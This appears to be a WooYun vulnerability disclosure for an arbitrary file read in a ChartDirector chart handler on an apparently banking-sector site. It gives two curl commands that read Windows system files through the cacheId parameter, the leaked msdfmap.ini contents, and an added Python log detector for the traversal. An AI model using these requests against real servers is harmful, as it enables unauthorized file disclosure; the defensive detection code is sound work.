WooYun (WooYun.org) historical vulnerability lookup --- http://wy.zone.ci/
WooYun Drops articles, online reader -------- http://drop.zone.ci/
2015-11-10: Details sent to the vendor, awaiting the vendor's handling
2015-11-20: Vendor has confirmed; details disclosed to the vendor only
2015-11-30: Details disclosed to core white hats and experts in the relevant field
2015-12-10: Details disclosed to regular white hats
2015-12-20: Details disclosed to intern white hats
2016-01-11: Details disclosed to the public
As the title says.
curl -i http://**.**.**.**/Chart/OilChart.aspx\?ChartDirectorChartImage\=chart_fxChart\&cacheDefeat\=635826864174711701\&cacheId\=c:/windows/win.ini
curl http://**.**.**.**/Chart/OilChart.aspx\?ChartDirectorChartImage\=chart_fxChart\&cacheDefeat\=635826864174711701\&cacheId\=c:/windows/msdfmap.ini
;[connect name] will modify the connection if ADC.connect="name"
;[connect default] will modify the connection if name is not found
;[sql name] will modify the Sql if ADC.sql="name(args)"
;[sql default] will modify the Sql if name is not found
;Override strings: Connect, UserId, Password, Sql.
;Only the Sql strings support parameters using "?"
;The override strings must not equal "" or they are ignored
;A Sql entry must exist in each sql section or the section is ignored
;An Access entry must exist in each connect section or the section is ignored
;Access=NoAccess
;Access=ReadOnly
;Access=ReadWrite
;[userlist name] allows specific users to have special access
;The Access is computed as follows:
; (1) First take the access of the connect section.
; (2) If a user entry is found, it will override.

[connect default]
;If we want to disable unknown connect values, we set Access to NoAccess
Access=NoAccess

[sql default]
;If we want to disable unknown sql values, we set Sql to an invalid query.
Sql=" "

[connect CustomerDatabase]
Access=ReadWrite
Connect="DSN=AdvWorks"

[sql CustomerById]
Sql="SELECT * FROM Customers WHERE CustomerID = ?"

[connect AuthorDatabase]
Access=ReadOnly
Connect="DSN=MyLibraryInfo;UID=MyUserID;PWD=MyPassword"

[userlist AuthorDatabase]
Administrator=ReadWrite

[sql AuthorById]
Sql="SELECT * FROM Authors WHERE au_id = ?"
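The two requests above read local files through the ChartDirector image handler's cacheId parameter. As an added example (not part of the original report), the following detector scans IIS access log lines for ChartDirectorChartImage requests whose cacheId is an absolute path, a UNC path, or contains a ".." segment; the log lines and the W3C field layout (date time cs-uri-stem cs-uri-query sc-status) are constructed assumptions.

```python
import re
from urllib.parse import parse_qs, unquote

# Constructed sample lines (assumed IIS W3C fields: date time cs-uri-stem cs-uri-query sc-status).
SAMPLE_LOG = """\
2015-11-10 10:01:02 /Chart/OilChart.aspx ChartDirectorChartImage=chart_fxChart&cacheDefeat=635826864174711701&cacheId=chart_fxChart_1 200
2015-11-10 10:01:05 /Chart/OilChart.aspx ChartDirectorChartImage=chart_fxChart&cacheDefeat=635826864174711701&cacheId=c:/windows/win.ini 200
2015-11-10 10:01:09 /Chart/OilChart.aspx ChartDirectorChartImage=chart_fxChart&cacheDefeat=635826864174711701&cacheId=..%2F..%2Fwindows%2Fwin.ini 200
2015-11-10 10:02:00 /index.aspx page=1 200
"""

# A cacheId that escapes the chart cache: drive-letter or UNC absolute path,
# a rooted path, or any ".." segment (checked after URL decoding).
SUSPICIOUS_CACHEID = re.compile(r"^(?:[a-zA-Z]:|\\\\|/|\\)|(?:^|[\\/])\.\.(?:[\\/]|$)")


def is_suspicious_cacheid(value: str) -> bool:
    """True if the cacheId points outside the chart cache directory."""
    # parse_qs already decodes once; decode again to catch double-encoded values.
    decoded = unquote(value)
    return bool(SUSPICIOUS_CACHEID.search(decoded))


def find_chart_file_reads(log_text: str) -> list[dict]:
    """One record per ChartDirector image request carrying a suspicious cacheId."""
    hits = []
    for line in log_text.splitlines():
        parts = line.split()
        if len(parts) < 5:
            continue
        date, time, stem, query, status = parts[:5]
        params = parse_qs(query, keep_blank_values=True)
        if "ChartDirectorChartImage" not in params:
            continue  # not the chart image handler
        for cache_id in params.get("cacheId", []):
            if is_suspicious_cacheid(cache_id):
                hits.append({"time": f"{date} {time}", "uri": stem,
                             "cacheId": unquote(cache_id), "status": status})
    return hits


if __name__ == "__main__":
    for hit in find_chart_file_reads(SAMPLE_LOG):
        print(hit)
```

Legitimate chart requests use an opaque cache key, so any rooted path or traversal in cacheId is worth alerting on regardless of the response status.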
Severity: Medium
Vulnerability Rank: 8
Confirmation time: 2015-11-20 17:10
CNVD confirmed and reproduced the described situation; it has been forwarded via CNCERT to the banking sector's IT regulatory authority for notification, which will coordinate remediation with the website's operator; it has also been forwarded via CNCERT to the Shanghai branch center.
None yet.